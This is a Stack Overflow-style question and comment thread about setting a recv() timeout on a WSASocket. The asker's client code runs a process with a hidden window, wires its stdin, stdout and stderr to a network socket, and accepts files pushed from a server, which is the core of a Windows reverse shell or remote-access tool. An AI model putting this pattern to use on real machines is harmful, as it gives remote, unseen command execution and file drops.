# C++ winsock, Problems with WSASocket()

Tags: c++, sockets, winapi, winsock

MY client application in Winsock C++, is having trouble with 2 things.
Firstly, I have one function where the stdin, stderr and stdout of a process is being redirected to Socket. To do this, I must use `WSASocket()`. IT works, But there is another function where I am receiving a file from server, And I need to set a `recv()` timeout.

**The  problems** :

- If I use `WSASocket()`, Adding timeout to the socket won't work, So my file receive function won't work. Adding timeout like this.

```cpp
setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout, sizeof(timeout));
```

- If I use `socket()`, I can add timeout and my file receive function will work. BUT then I cannot get the stdin, stderr and stdout of a process redirected to a Socket.

**Expected Solution**

- `WSASocket()` with `setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout, sizeof(timeout));`. Or some other way I can add a timeout to `recv()` while using `WSASocket()`. I can use `socket()` as stated [here](https://stackoverflow.com/questions/4993119/redirect-io-of-process-to-windows-socket). But `WSASocket()` works and I don't have to call `setsockopt()` again. So That's good.

**File Receive function**

```cpp
    std::ostringstream response; std::string fs;
    DWORD timeout = 5000;
    DWORD after =0;
    char* filename[5]; // FILE:FILENAME:filesize
    memset(filename, '\0', 5);
    split(recvbuf, filename, ":");
    file_s = filename[1];
    fs = filename[2];
    int intfs = std::stoi(fs);
    std::ofstream file(file_s.c_str(),  std::ios::app | std::ios::binary);
    int fsize;
    memset(recvbuf, '\0', 500);
    setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout, sizeof(timeout));
    Sleep(1000);
    while ((fsize = recv(sockfd, recvbuf, sizeof(recvbuf), 0)) > 0)
    {
        file.write(recvbuf, sizeof(recvbuf));
    }
    file.close();
    setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (char*)&after, sizeof(after));
    if(isFile(file_s.c_str()))
    {
        response << "\nFile : " << file_s.c_str() << "\nSize : " << filesize(file_s.c_str()) << " bytes";
        send_data(response.str());  
    } else {
        response << "File not found : " << file_s.c_str() << " -> (ERROR CODE) " << GetLastError();
        send_data(response.str());
    }
```

**Redirect CreateProcess Output to Socket.**

```cpp
STARTUPINFO sinfo;
    PROCESS_INFORMATION pinfo;
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
    sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) sockfd;
    if(CreateProcess(NULL, (LPSTR)command, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo)){
        WaitForSingleObject(pinfo.hProcess, INFINITE);
        CloseHandle(pinfo.hProcess);
        CloseHandle(pinfo.hThread);
    }
```

Comment: On a Unix-like system, `select` is great to setup timeout on IO be it a socket or not. But on Windows it can only be used on a socket. But in [this other SO post](https://stackoverflow.com/q/41743043/3545273) you will find how to use `WSAWaitForMultipleEvents` to set a timeout on a WSASocket, or to use Overlapped IO on the WSASocket to but a standard event on it and make it waitable with the standard `WaitForMultipleEvents`

Comment: What does your call to `WSASocket()` actually look like? What happens exactly when the `recv()` timeout doesn't work? Do you get an error, a hang, ...? Have you tried alternate ways to wait for data with timeout before calling `recv()`, such as `select()` or `WSAEventSelect()`?

Comment: `socket` internal call `WSASocket` - so strange if it work for `socket` but not for `WSASocket` (different only in what *dwFlags* you use). but in general despite pass socket to child process partial work, this not good solution

Comment: @SergeBallesta You are right, and that is exactly what I'm looking for, Being able to set timeout on WSASocket would solve my problem. Can't use overlapped IO or I won't get the output of CreateProcess. Thanks for your help! I will look into ``WSAWaitForMultipleEvents``. :)

Comment: @RemyLebeau Here is how my call to ``WSASocket`` looks like. ``sockfd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, 0);`` And when the recv timeout doesn't work, What happens is the client is stuck in that loop you can see above. Whatever else that is sent from server side is also written to file.

Comment: @RbMm Well no, It may call WSASocket internally. But by default, ``socket()`` creates an overlapped io socket. And WSASocket does not.

Comment: @coderman You need to specify the `WSA_FLAG_OVERLAPPED` flag on `WSASocket()` in order to use an `SO_RCVTIMEO` timeout on `recv()`. By default, `socket()` creates a socket with that flag enabled, but `WSASocket()` does not (see [Default State for a Socket's Overlapped Attribute](https://learn.microsoft.com/en-us/windows/win32/winsock/default-state-for-a-socket-s-overlapped-attribute-2)). Otherwise, use `select()` or equivalent to handle the timeout, and don't call `recv()` until the socket is actually in a readable state.

Comment: @RemyLebeau Yes I know that, but As I stated in my question, If I do that, Or use ``socket()``, The output of CreateProcess won't be redirected  to my socket.

Comment: Maybe if there is a way to set the socket to overlapped io only when I'm receiving the file, then set it back. That way my problem will be solved.

Comment: @coderman "*Yes I know that*" - well, you didn't state that earlier. "*Maybe if there is a way to set the socket to overlapped io only when I'm receiving the file, then set it back*" - see [Redirect IO of process to Windows socket](https://stackoverflow.com/questions/4993119/) - [this answer](https://stackoverflow.com/a/37114054/65863) tells how to use `socket()` with `CreateProcess()`. The alternative is to simply not use a socket with `CreateProcess()` directly to begin with. Use a pipe instead, and then proxy data back and forth between the pipe and socket at needed.